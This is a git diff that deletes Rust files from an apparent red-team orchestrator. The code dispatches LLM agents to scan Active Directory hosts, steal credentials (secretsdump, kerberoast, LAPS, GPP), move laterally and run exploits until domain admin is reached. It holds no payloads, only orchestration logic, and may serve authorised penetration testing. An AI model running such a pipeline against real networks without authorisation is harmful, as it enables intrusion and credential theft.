t2.enqueue_time).abs() < f64::EPSILON); - } -} diff --git a/ares-orchestrator/src/dispatcher/mod.rs b/ares-orchestrator/src/dispatcher/mod.rs deleted file mode 100644 index 59901e70..00000000 --- a/ares-orchestrator/src/dispatcher/mod.rs +++ /dev/null @@ -1,132 +0,0 @@ -//! Central dispatcher — ties together task submission, throttling, and state. -//! -//! All task submission goes through `Dispatcher::throttled_submit()` which checks -//! the throttler, submits or defers, and tracks active tasks. Convenience methods -//! like `request_crack()`, `request_recon()` etc. build the correct payloads. - -mod submission; -mod task_builders; - -use std::collections::HashMap; -use std::sync::Arc; -use tokio::sync::{Mutex, Notify}; - -use crate::config::OrchestratorConfig; -use crate::deferred::DeferredQueue; -use crate::llm_runner::LlmTaskRunner; -use crate::routing::ActiveTaskTracker; -use crate::state::SharedState; -use crate::task_queue::TaskQueue; -use crate::throttling::Throttler; - -// --------------------------------------------------------------------------- -// Per-credential in-flight limiter -// --------------------------------------------------------------------------- - -/// Limits how many concurrent LLM agent loops may be in-flight for the same -/// credential. Prevents thundering-herd when only one credential has been -/// discovered and both automation loops try to spawn many tasks with it. -#[derive(Clone)] -pub struct CredentialInflight { - inner: Arc>>, - max_per_credential: usize, -} - -impl CredentialInflight { - pub fn new(max_per_credential: usize) -> Self { - Self { - inner: Arc::new(Mutex::new(HashMap::new())), - max_per_credential, - } - } - - /// Try to acquire a slot. Returns `true` if under the limit. - pub async fn try_acquire(&self, key: &str) -> bool { - let mut map = self.inner.lock().await; - let count = map.entry(key.to_string()).or_insert(0); - if *count < self.max_per_credential { - *count += 1; - true - } else { - false - } - } - - /// Check if a slot is available WITHOUT acquiring it. - pub async fn can_acquire(&self, key: &str) -> bool { - let map = self.inner.lock().await; - match map.get(key) { - Some(count) => *count < self.max_per_credential, - None => true, - } - } - - /// Release a slot when the task completes (success or failure). - pub async fn release(&self, key: &str) { - let mut map = self.inner.lock().await; - if let Some(count) = map.get_mut(key) { - *count = count.saturating_sub(1); - if *count == 0 { - map.remove(key); - } - } - } -} - -/// Extract `"user@domain"` from a task payload's `credential` field. -pub fn credential_key_from_payload(payload: &serde_json::Value) -> Option { - let cred = payload.get("credential")?; - let username = cred.get("username").and_then(|v| v.as_str())?; - let domain = cred.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - Some(format!("{}@{}", username, domain)) -} - -/// Central dispatcher for submitting tasks with throttling and routing. -pub struct Dispatcher { - pub queue: TaskQueue, - pub tracker: ActiveTaskTracker, - pub throttler: Arc, - pub deferred: Arc, - pub state: SharedState, - pub config: Arc, - /// YAML config (agent roles, vulnerability priorities, context management). - /// `None` if no YAML config file was found at startup. - pub ares_config: Option>, - /// Notifies auto_credential_access to wake up when new creds arrive. - pub credential_access_notify: Arc, - /// Notifies auto_delegation_enumeration to wake up when new creds arrive. - pub delegation_notify: Arc, - /// LLM runner — drives tasks through the Rust agent loop. - pub llm_runner: Arc, - /// Per-credential concurrency limiter. - pub credential_inflight: CredentialInflight, -} - -impl Dispatcher { - #[allow(clippy::too_many_arguments)] - pub fn new( - queue: TaskQueue, - tracker: ActiveTaskTracker, - throttler: Arc, - deferred: Arc, - state: SharedState, - config: Arc, - ares_config: Option>, - llm_runner: Arc, - ) -> Self { - Self { - queue, - tracker, - throttler, - deferred, - state, - config, - ares_config, - credential_access_notify: Arc::new(Notify::new()), - delegation_notify: Arc::new(Notify::new()), - llm_runner, - // Allow up to 3 concurrent tasks per credential - credential_inflight: CredentialInflight::new(3), - } - } -} diff --git a/ares-orchestrator/src/dispatcher/submission.rs b/ares-orchestrator/src/dispatcher/submission.rs deleted file mode 100644 index a102c71c..00000000 --- a/ares-orchestrator/src/dispatcher/submission.rs +++ /dev/null @@ -1,450 +0,0 @@ -//! Task submission — throttled_submit and do_submit. - -use std::collections::HashMap; -use std::sync::Arc; - -use anyhow::Result; -use chrono::Utc; -use serde_json::{json, Value}; -use tracing::{debug, info, warn}; - -use crate::deferred::DeferredTask; -use crate::llm_runner::LlmTaskRunner; -use crate::routing::ActiveTask; -use crate::task_queue::TaskResult; -use crate::throttling::ThrottleDecision; - -use ares_llm::LoopEndReason; - -use super::Dispatcher; - -impl Dispatcher { - /// Submit a task with throttle checking. Returns the task_id if submitted, - /// None if deferred or rejected. - pub async fn throttled_submit( - &self, - task_type: &str, - target_role: &str, - payload: serde_json::Value, - priority: i32, - ) -> Result> { - let decision = self - .throttler - .check(task_type, target_role, Some(&payload)) - .await; - - match decision { - ThrottleDecision::Allow => { - self.do_submit(task_type, target_role, payload, priority) - .await - } - ThrottleDecision::Defer => { - let task = DeferredTask { - priority, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - match self.deferred.enqueue(&task).await { - Ok(true) => { - debug!(task_type, target_role, "Task deferred"); - Ok(None) - } - Ok(false) => { - debug!(task_type, target_role, "Deferred queue full, task dropped"); - Ok(None) - } - Err(e) => { - warn!(err = %e, "Failed to defer task, attempting direct submit"); - self.do_submit(task_type, target_role, task.payload, priority) - .await - } - } - } - ThrottleDecision::Wait(dur) => { - // Sleep and retry once - tokio::time::sleep(dur).await; - let retry_decision = self - .throttler - .check(task_type, target_role, Some(&payload)) - .await; - match retry_decision { - ThrottleDecision::Allow => { - self.do_submit(task_type, target_role, payload, priority) - .await - } - _ => { - let task = DeferredTask { - priority, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - let _ = self.deferred.enqueue(&task).await; - Ok(None) - } - } - } - } - } - - /// Direct submit (bypasses throttle). Returns task_id. - /// - /// Routes the task to the Rust LLM agent loop. Prefers `target_role` - /// when it maps to a valid AgentRole (e.g. MSSQL exploit → lateral), - /// falling back to `role_for_task_type` for the default mapping. - pub async fn do_submit( - &self, - task_type: &str, - target_role: &str, - payload: serde_json::Value, - _priority: i32, - ) -> Result> { - // Prefer the caller-specified target_role (from recommended_agent) - // over the static task_type → role mapping. This lets automation - // modules like MSSQL route exploits to lateral instead of privesc. - let role = ares_llm::tool_registry::AgentRole::parse(target_role) - .or_else(|| crate::llm_runner::role_for_task_type(task_type)); - - let role = match role { - Some(r) => r, - None => { - warn!( - task_type = task_type, - target_role = target_role, - "No LLM role mapping for task type or target role, dropping" - ); - return Ok(None); - } - }; - - self.submit_to_llm( - self.llm_runner.clone(), - task_type, - target_role, - role, - payload, - ) - .await - } - - /// Submit a task to the Rust LLM agent loop. Spawns a background tokio - /// task and pushes the result back through the normal result queue so it - /// flows through `process_completed_task()`. - async fn submit_to_llm( - &self, - runner: Arc, - task_type: &str, - target_role: &str, - role: ares_llm::tool_registry::AgentRole, - payload: serde_json::Value, - ) -> Result> { - // Per-credential concurrency gate: if too many tasks are already - // in-flight for this credential, defer instead of spawning another. - let cred_key = super::credential_key_from_payload(&payload); - if let Some(ref key) = cred_key { - if !self.credential_inflight.try_acquire(key).await { - info!( - credential = key.as_str(), - task_type, "Credential concurrency limit reached, deferring task" - ); - let task = DeferredTask { - priority: 3, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - let _ = self.deferred.enqueue(&task).await; - return Ok(None); - } - } - - let task_id = format!( - "{}_{}", - task_type, - &uuid::Uuid::new_v4().simple().to_string()[..12] - ); - - info!( - task_id = %task_id, - task_type = task_type, - role = target_role, - "Routing task to LLM runner (Rust agent loop)" - ); - - self.tracker - .add(ActiveTask { - task_id: task_id.clone(), - task_type: task_type.to_string(), - role: target_role.to_string(), - submitted_at: std::time::Instant::now(), - }) - .await; - - self.throttler.record_dispatch().await; - - // Set initial task status with full metadata - let _ = self - .queue - .set_task_status_full( - &task_id, - "in_progress", - &self.config.operation_id, - target_role, - task_type, - Some(&payload), - ) - .await; - - // Persist pending task to Redis HASH for recovery - let now = Utc::now(); - let mut task_params: HashMap = HashMap::new(); - if let Some(ref key) = cred_key { - task_params.insert("credential_key".to_string(), serde_json::json!(key)); - } - let task_info = ares_core::models::TaskInfo { - task_id: task_id.clone(), - task_type: task_type.to_string(), - assigned_agent: target_role.to_string(), - status: ares_core::models::TaskStatus::InProgress, - created_at: now, - started_at: Some(now), - completed_at: None, - last_activity_at: now, - params: task_params, - result: None, - error: None, - retry_count: 0, - max_retries: 3, - }; - let _ = self.state.track_pending_task(&self.queue, task_info).await; - - // Capture vuln_id from exploit payloads so it survives into the result. - let vuln_id_for_result = payload - .get("vuln_id") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()); - - // Spawn the LLM agent loop as a background task - let queue = self.queue.clone(); - let tid = task_id.clone(); - let tt = task_type.to_string(); - let cred_inflight = self.credential_inflight.clone(); - let cred_key_owned = cred_key.clone(); - tokio::spawn(async move { - let outcome = runner.execute_task(&tt, &tid, role, &payload).await; - - // Token usage is now recorded incrementally per-LLM-call via - // CallbackHandler::on_token_usage — no batch recording needed here. - - // Convert outcome to TaskResult and push to result queue - let mut result = match outcome { - Ok(outcome) => { - // Merge all structured discoveries from tool results - let merged_discoveries = if outcome.discoveries.is_empty() { - None - } else { - Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries)) - }; - - // Collect raw tool outputs for secondary regex extraction - let tool_outputs_json: Vec = outcome - .tool_outputs - .iter() - .map(|s| Value::String(s.clone())) - .collect(); - - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => { - // The result may be a JSON string (serialized object from - // the LLM) or plain text. If it parses as JSON, merge its - // fields into the result payload so extract_discoveries() - // can find any LLM-reported hosts/credentials. - let mut result_json = - if let Ok(parsed) = serde_json::from_str::(result) { - if parsed.is_object() { - let mut obj = parsed; - obj["steps"] = json!(outcome.steps); - obj["tool_calls"] = json!(outcome.tool_calls_dispatched); - obj - } else { - json!({ - "summary": result, - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }) - } - } else { - json!({ - "summary": result, - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }) - }; - // Overwrite "discoveries" with parser-extracted data only. - // The LLM's task_complete result is untrusted prose — - // any discovery-like keys it contains are ignored. - // Only ares-tools parsers (run on real tool stdout) - // produce authoritative discoveries. - if let Some(obj) = result_json.as_object_mut() { - obj.remove("discoveries"); - } - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: true, - result: Some(result_json), - error: None, - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::RequestAssistance { issue, context } => { - let mut result_json = json!({ - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: false, - result: Some(result_json), - error: Some(format!( - "Assistance needed: {issue} (context: {context})" - )), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::MaxSteps => { - let mut result_json = json!({ - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: false, - result: Some(result_json), - error: Some("Agent hit max steps limit".into()), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::EndTurn { content } => { - let mut result_json = json!({"summary": content}); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: true, - result: Some(result_json), - error: None, - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::MaxTokens => { - let mut result_json = json!({ - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: false, - result: Some(result_json), - error: Some("Agent hit max tokens".into()), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::Error(err) => TaskResult { - task_id: tid.clone(), - success: false, - result: None, - error: Some(err.clone()), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - }, - } - } - Err(e) => TaskResult { - task_id: tid.clone(), - success: false, - result: None, - error: Some(format!("LLM runner error: {e}")), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - }, - }; - - // Inject vuln_id into result so process_completed_task can mark_exploited. - if let Some(ref vid) = vuln_id_for_result { - if let Some(ref mut res) = result.result { - if let Some(obj) = res.as_object_mut() { - obj.insert("vuln_id".to_string(), json!(vid)); - } - } - } - - // Release per-credential concurrency slot - if let Some(ref key) = cred_key_owned { - cred_inflight.release(key).await; - } - - // Push result to the normal result queue so the result consumer picks it up - if let Err(e) = queue.send_result(&tid, &result).await { - warn!( - task_id = %tid, - err = %e, - "Failed to push LLM task result to Redis" - ); - } - }); - - Ok(Some(task_id)) - } -} diff --git a/ares-orchestrator/src/dispatcher/task_builders.rs b/ares-orchestrator/src/dispatcher/task_builders.rs deleted file mode 100644 index 01afff2e..00000000 --- a/ares-orchestrator/src/dispatcher/task_builders.rs +++ /dev/null @@ -1,463 +0,0 @@ -//! Convenience methods for common task types (request_crack, request_recon, etc.). - -use anyhow::Result; -use serde_json::json; -use tracing::{debug, info}; - -use crate::state::DEDUP_SCANNED_TARGETS; - -use super::Dispatcher; - -impl Dispatcher { - /// Submit a crack task for a hash. - pub async fn request_crack(&self, hash: &ares_core::models::Hash) -> Result> { - let payload = json!({ - "hash_type": hash.hash_type, - "hash_value": hash.hash_value, - "username": hash.username, - "domain": hash.domain, - }); - // Crack tasks are non-LLM, normal priority - self.throttled_submit("crack", "cracker", payload, 5).await - } - - /// Submit a recon task. - /// - /// Guards (mirroring Python's `request_recon` in `routing.py`): - /// 1. Skip entirely if domain admin has been achieved - /// 2. Skip nmap tasks if all targets are already in `scanned_targets` - /// 3. Auto-dispatch nmap prerequisite before enumeration if targets not scanned - pub async fn request_recon( - &self, - target_ip: &str, - domain: &str, - techniques: &[&str], - credential: Option<&ares_core::models::Credential>, - ) -> Result> { - // Guard 1: Skip recon if domain admin already achieved - { - let state = self.state.read().await; - if state.has_domain_admin { - debug!( - target_ip = target_ip, - "Skipping recon — domain admin already achieved" - ); - return Ok(None); - } - } - - let is_nmap = techniques.contains(&"network_scan") || techniques.contains(&"nmap_scan"); - let is_smb_signing = techniques.contains(&"smb_signing_check"); - let is_scan_only = (is_nmap || is_smb_signing) - && techniques - .iter() - .all(|t| *t == "network_scan" || *t == "nmap_scan" || *t == "smb_signing_check"); - - // Guard 2: Skip nmap/scan tasks if target already scanned - if is_scan_only { - let state = self.state.read().await; - if state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) { - debug!( - target_ip = target_ip, - "Skipping scan — target already in scanned_targets" - ); - return Ok(None); - } - } - - // Guard 3: Auto-dispatch nmap prerequisite before enumeration - // If this is NOT a scan task and the target hasn't been scanned yet, - // dispatch an nmap scan first at priority 1 (urgent). - if !is_scan_only { - let needs_scan = { - let state = self.state.read().await; - !state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) - }; - if needs_scan { - info!( - target_ip = target_ip, - "Auto-dispatching nmap prerequisite before enumeration" - ); - let scan_payload = json!({ - "target_ip": target_ip, - "domain": domain, - "techniques": ["network_scan", "smb_signing_check"], - }); - // Priority 1 = urgent, scanned before the enumeration task - let _ = self - .throttled_submit("recon", "recon", scan_payload, 1) - .await; - } - } - - // Mark nmap targets as scanned (optimistic, to prevent duplicate dispatches) - if is_nmap { - { - let mut state = self.state.write().await; - state.mark_processed(DEDUP_SCANNED_TARGETS, target_ip.to_string()); - } - // Persist to Redis so it survives restarts - let _ = self - .state - .persist_dedup(&self.queue, DEDUP_SCANNED_TARGETS, target_ip) - .await; - } - - let mut payload = json!({ - "target_ip": target_ip, - "domain": domain, - "techniques": techniques, - }); - if let Some(cred) = credential { - payload["credential"] = json!({ - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }); - } - - // Nmap tasks get priority 1, other recon priority 5 - let priority = if is_nmap { 1 } else { 5 }; - self.throttled_submit("recon", "recon", payload, priority) - .await - } - - /// Submit a low-hanging fruit credential discovery task (SYSVOL, GPP, LDAP, LAPS). - /// - /// Mirrors Python's fast credential discovery dispatch: sends multiple high-success-rate - /// techniques in a single task so the LLM agent executes them sequentially. - pub async fn request_low_hanging_fruit( - &self, - target_ip: &str, - domain: &str, - credential: &ares_core::models::Credential, - priority: i32, - ) -> Result> { - let payload = json!({ - "techniques": [ - "sysvol_script_search", - "gpp_password_finder", - "ldap_search_descriptions", - "laps_dump" - ], - "reason": "low_hanging_fruit", - "target_ip": target_ip, - "domain": domain, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, priority) - .await - } - - /// Submit a credential access task (kerberoast, asrep, secretsdump, etc.). - pub async fn request_credential_access( - &self, - technique: &str, - target_ip: &str, - domain: &str, - credential: &ares_core::models::Credential, - priority: i32, - ) -> Result> { - let payload = json!({ - "technique": technique, - "target_ip": target_ip, - "domain": domain, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, priority) - .await - } - - /// Submit a secretsdump task. - pub async fn request_secretsdump( - &self, - target_ip: &str, - credential: &ares_core::models::Credential, - priority: i32, - ) -> Result> { - let payload = json!({ - "technique": "secretsdump", - "target_ip": target_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, priority) - .await - } - - /// Submit a lateral movement task. - pub async fn request_lateral( - &self, - target_ip: &str, - credential: &ares_core::models::Credential, - technique: &str, - ) -> Result> { - let payload = json!({ - "technique": technique, - "target_ip": target_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("lateral_movement", "lateral", payload, 5) - .await - } - - /// Submit an exploit task for a vulnerability. - /// - /// Looks up the best available credential or hash for the vuln's target/domain - /// and attaches it to the payload so the agent doesn't have to discover auth independently. - pub async fn request_exploit( - &self, - vuln: &ares_core::models::VulnerabilityInfo, - priority: i32, - ) -> Result> { - let mut payload = json!({ - "vuln_id": vuln.vuln_id, - "vuln_type": vuln.vuln_type, - "target": vuln.target, - "details": vuln.details, - }); - - // Look up credentials for this exploit from state - { - let state = self.state.read().await; - - // Try account_name from vuln details first, then fall back to any cred for the target domain - let account_name = vuln - .details - .get("account_name") - .and_then(|v| v.as_str()) - .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())); - - let domain = vuln - .details - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or(""); - - // Try to find a matching credential - let cred = if let Some(acct) = account_name { - state - .credentials - .iter() - .find(|c| c.username.to_lowercase() == acct.to_lowercase()) - } else { - None - } - .or_else(|| { - // Fall back to any non-delegation credential for the vuln's domain - if !domain.is_empty() { - state.credentials.iter().find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !state.is_delegation_account(&c.username) - }) - } else { - // Fall back to first available non-delegation credential - state - .credentials - .iter() - .find(|c| !state.is_delegation_account(&c.username)) - } - }); - - if let Some(cred) = cred { - payload["credential"] = json!({ - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }); - } - - // For MSSQL vulns, include ALL available credentials for the domain - // so the LLM can try each one (different users have different MSSQL - // permissions — e.g. sam.wilson can EXECUTE AS LOGIN = 'sa'). - if vuln.vuln_type.starts_with("mssql") && !domain.is_empty() { - let all_creds: Vec<_> = state - .credentials - .iter() - .filter(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !state.is_delegation_account(&c.username) - }) - .map(|c| { - json!({ - "username": c.username, - "password": c.password, - "domain": c.domain, - }) - }) - .collect(); - if all_creds.len() > 1 { - payload["all_credentials"] = json!(all_creds); - } - } - - // Also attach a hash if available for the account - if let Some(acct) = account_name { - if let Some(hash) = state - .hashes - .iter() - .find(|h| h.username.to_lowercase() == acct.to_lowercase()) - { - payload["hash"] = json!(hash.hash_value); - payload["hash_username"] = json!(hash.username); - if let Some(ref aes) = hash.aes_key { - payload["aes_key"] = json!(aes); - } - } - } - } - - let role = if vuln.recommended_agent.is_empty() { - "privesc" - } else { - &vuln.recommended_agent - }; - self.throttled_submit("exploit", role, payload, priority) - .await - } - - /// Submit a BloodHound collection task. - pub async fn request_bloodhound( - &self, - domain: &str, - dc_ip: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "bloodhound_collect", - "domain": domain, - "target_ip": dc_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("recon", "recon", payload, 7).await - } - - /// Submit a delegation enumeration task. - pub async fn request_delegation_enum( - &self, - domain: &str, - dc_ip: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "find_delegation", - "domain": domain, - "target_ip": dc_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("privesc_enumeration", "recon", payload, 5) - .await - } - - /// Submit a share enumeration task against a host using credentials. - pub async fn request_share_enumeration( - &self, - host_ip: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "techniques": ["enumerate_shares"], - "target_ip": host_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("recon", "recon", payload, 5).await - } - - /// Submit a share spider task. - pub async fn request_share_spider( - &self, - host_ip: &str, - share_name: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "share_spider", - "target_ip": host_ip, - "share_name": share_name, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, 8) - .await - } - - /// Submit a coercion task. - pub async fn request_coercion( - &self, - target_ip: &str, - listener_ip: &str, - techniques: &[&str], - ) -> Result> { - let payload = json!({ - "target_ip": target_ip, - "listener_ip": listener_ip, - "techniques": techniques, - }); - self.throttled_submit("coercion", "coercion", payload, 3) - .await - } - - /// Submit a CERTIPY find task for ADCS enumeration. - pub async fn request_certipy_find( - &self, - target_ip: &str, - domain: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "certipy_find", - "target_ip": target_ip, - "domain": domain, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("recon", "recon", payload, 4).await - } - - /// Refresh the operation lock TTL. Called periodically. - pub async fn extend_lock(&self) -> Result<()> { - let op_id = self.state.operation_id().await; - self.queue.extend_lock(&op_id, self.config.lock_ttl).await?; - Ok(()) - } - - /// Publish a state update notification via Redis PubSub. - pub async fn notify_state_update(&self) -> Result<()> { - let op_id = self.state.operation_id().await; - self.queue.publish_state_update(&op_id).await?; - Ok(()) - } -} diff --git a/ares-orchestrator/src/exploitation.rs b/ares-orchestrator/src/exploitation.rs deleted file mode 100644 index e56eab30..00000000 --- a/ares-orchestrator/src/exploitation.rs +++ /dev/null @@ -1,196 +0,0 @@ -//! Exploitation workflow — semaphore-gated exploit dispatch. -//! -//! Mirrors the Python `exploitation_workflow` background task that dequeues -//! vulnerabilities from a Redis ZSET and dispatches exploit tasks with -//! concurrency limited to 3 simultaneous exploits. - -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use redis::AsyncCommands; -use tokio::sync::{watch, Semaphore}; -use tokio::time::Instant; -use tracing::{debug, info, warn}; - -use ares_core::models::VulnerabilityInfo; - -use crate::dispatcher::Dispatcher; - -/// Cooldown before re-dispatching a failed exploit for the same vulnerability. -const EXPLOIT_RETRY_COOLDOWN: Duration = Duration::from_secs(120); - -/// Maximum concurrent exploit tasks. -const MAX_CONCURRENT_EXPLOITS: usize = 3; - -/// Spawn the exploitation workflow background task. -/// -/// Continuously pops vulnerabilities from the priority ZSET and dispatches -/// exploit tasks, respecting a semaphore limit. -pub async fn exploitation_workflow( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let semaphore = Arc::new(Semaphore::new(MAX_CONCURRENT_EXPLOITS)); - let mut interval = tokio::time::interval(Duration::from_secs(5)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - // Track dispatch times locally to allow retry after cooldown. - // Unlike `exploited_vulnerabilities` (permanent), this only prevents - // rapid re-dispatch within the same session. - let mut dispatched_at: HashMap = HashMap::new(); - - info!("Exploitation workflow started (max concurrent: {MAX_CONCURRENT_EXPLOITS})"); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Check if we have domain admin — stop exploiting once achieved - { - let state = dispatcher.state.read().await; - if state.has_domain_admin { - debug!("Domain admin achieved — exploitation workflow idle"); - continue; - } - } - - // Try to pop the highest-priority vuln from the ZSET - match pop_next_vuln(&dispatcher).await { - Ok(Some(vuln)) => { - // Skip delegation vulns — s4u.rs handles these with proper - // credential checking and lockout-aware dispatch. The generic - // exploitation path falls back to wrong credentials and - // produces LLM errors with missing target_spn. - { - let vtype = vuln.vuln_type.to_lowercase(); - if vtype == "constrained_delegation" - || vtype == "unconstrained_delegation" - || vtype == "rbcd" - { - debug!( - vuln_id = %vuln.vuln_id, - vuln_type = %vuln.vuln_type, - "Skipping delegation vuln (handled by s4u automation)" - ); - continue; - } - } - - // Check if permanently marked exploited (set by result processing on success) - { - let state = dispatcher.state.read().await; - if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { - debug!(vuln_id = %vuln.vuln_id, "Already exploited, skipping"); - continue; - } - } - - // Check dispatch cooldown to prevent rapid re-dispatch - if let Some(last) = dispatched_at.get(&vuln.vuln_id) { - if last.elapsed() < EXPLOIT_RETRY_COOLDOWN { - // Still in cooldown — re-enqueue for later - let _ = requeue_vuln(&dispatcher, &vuln).await; - continue; - } - } - - // Acquire semaphore permit - let permit = match semaphore.clone().try_acquire_owned() { - Ok(p) => p, - Err(_) => { - // At capacity — re-enqueue and wait - let _ = requeue_vuln(&dispatcher, &vuln).await; - debug!("Exploit semaphore full, waiting"); - tokio::time::sleep(Duration::from_secs(2)).await; - continue; - } - }; - - let vuln_id = vuln.vuln_id.clone(); - let vuln_type = vuln.vuln_type.clone(); - let disp = dispatcher.clone(); - - // Record dispatch time for cooldown tracking - dispatched_at.insert(vuln_id.clone(), Instant::now()); - - // Spawn exploit task (does not block the main loop) - tokio::spawn(async move { - let _permit = permit; // held until this task completes - - match disp.request_exploit(&vuln, vuln.priority).await { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - vuln_id = %vuln_id, - vuln_type = %vuln_type, - "Exploit dispatched" - ); - // Re-enqueue with lower priority so the vuln survives - // task failures. The cooldown timer prevents immediate - // re-dispatch, and mark_exploited (called on success in - // result_processing) prevents re-dispatch after success. - let mut retry_vuln = vuln.clone(); - retry_vuln.priority = (vuln.priority + 2).min(10); - let _ = requeue_vuln(&disp, &retry_vuln).await; - } - Ok(None) => { - debug!(vuln_id = %vuln_id, "Exploit deferred by throttler"); - // Re-enqueue for later - let _ = requeue_vuln(&disp, &vuln).await; - } - Err(e) => { - warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch exploit"); - let _ = requeue_vuln(&disp, &vuln).await; - } - } - }); - } - Ok(None) => { - // No vulns in queue - } - Err(e) => { - warn!(err = %e, "Failed to pop vulnerability from queue"); - } - } - } -} - -/// Pop the lowest-score (highest-priority) vulnerability from the ZSET. -async fn pop_next_vuln(dispatcher: &Dispatcher) -> Result> { - let key = dispatcher.state.vuln_queue_key().await; - let mut conn = dispatcher.queue.connection(); - - // ZPOPMIN returns the member with the lowest score - let result: Vec<(String, f64)> = redis::cmd("ZPOPMIN") - .arg(&key) - .arg(1) - .query_async(&mut conn) - .await - .unwrap_or_default(); - - match result.into_iter().next() { - Some((json, _score)) => { - let vuln: VulnerabilityInfo = - serde_json::from_str(&json).map_err(|e| anyhow::anyhow!("Bad vuln JSON: {e}"))?; - Ok(Some(vuln)) - } - None => Ok(None), - } -} - -/// Re-enqueue a vulnerability into the ZSET (e.g., after throttle rejection). -async fn requeue_vuln(dispatcher: &Dispatcher, vuln: &VulnerabilityInfo) -> Result<()> { - let key = dispatcher.state.vuln_queue_key().await; - let mut conn = dispatcher.queue.connection(); - let json = serde_json::to_string(vuln)?; - let score = vuln.priority as f64; - let _: () = conn.zadd(&key, &json, score).await?; - Ok(()) -} diff --git a/ares-orchestrator/src/llm_runner.rs b/ares-orchestrator/src/llm_runner.rs deleted file mode 100644 index 2de2f224..00000000 --- a/ares-orchestrator/src/llm_runner.rs +++ /dev/null @@ -1,372 +0,0 @@ -//! LLM task runner — drives tasks through the Rust agent loop. -//! -//! Replaces the Python dreadnode Agent for LLM-driven tasks. -//! The runner builds 